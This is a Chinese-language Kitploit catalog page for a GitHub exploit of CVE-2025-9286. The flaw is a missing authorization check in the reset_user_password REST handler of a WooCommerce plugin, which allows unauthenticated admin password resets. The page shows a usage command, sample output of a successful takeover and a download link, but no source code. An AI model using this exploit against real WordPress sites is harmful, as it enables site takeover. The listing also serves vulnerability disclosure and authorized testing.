Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - 缺少授权导致未认证权限提升 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-9286
权限提升密码攻击漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 缺少授权导致未认证权限提升

查看仓库
90年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 授权缺失导致未认证权限提升

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - 通过 reset_user_password 的授权缺失导致未认证权限提升

📝 描述

Appy Pie Connect for WooCommerce 的 WordPress 插件在所有版本(包括 1.1.2)中,由于 reset_user_password() REST 处理程序缺少授权,存在权限提升漏洞。
这使得未认证攻击者能够重置任意用户(包括管理员)的密码,从而获取管理权限。

  • CVE: CVE-2025-9286
  • CVSS: 9.8(严重)

💻 利用脚本

以下利用脚本可用于针对运行该易受攻击插件版本的 WordPress 站点利用 CVE-2025-9286。

脚本名称: CVE-2025-9286.py

⚙️ 用法

python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 示例输出(成功利用)

[+] 检查插件版本:http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] 检测到易受攻击的插件(1.1.2)。正在尝试利用...
[*] 请稍候,正在尝试更改密码...
[+] 利用成功!密码已重置。
[*] 新密码:Nxploited
[+] 漏洞已利用,密码已成功更改。

📬 联系与社区

  • 📨 Telegram: @Kxploit
  • 📡 Telegram 频道: @KNxploited

⚠️ 免责声明

此利用脚本仅用于教育和授权的渗透测试目的。
未经明确许可对系统进行未授权使用属于违法行为。
作者不对因使用此工具造成的任何误用或损害负责。


作者:Khaled Alenazi (Nxploited)

下载工具